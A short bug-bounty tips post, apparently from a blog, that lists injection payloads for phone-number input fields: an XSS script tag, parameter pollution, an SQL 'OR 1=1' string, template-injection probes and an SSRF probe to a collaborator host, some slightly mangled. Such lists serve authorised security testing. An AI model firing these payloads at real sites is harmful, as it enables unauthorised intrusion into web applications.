Payloads to try on phone number input fields
XSs +441134960000;phone-context=<script>alert(0)</script> Parameter pollution (1) +441134960000;phone-context=&phone-context=+442.. Parameter pollution (2) +441134960000;ext=1;ext=? SQL injection +441134960000;phone-context=’ OR 1=1; — Template injection +441134960000;phone-context={{22}}[ [33]]{{77}}{% debug %} {77}{7*’7} SSRF +441134960000;phone-context=burocoaborator.net #BugBounty #bugbountytips #Payload

You must be logged in to post a comment.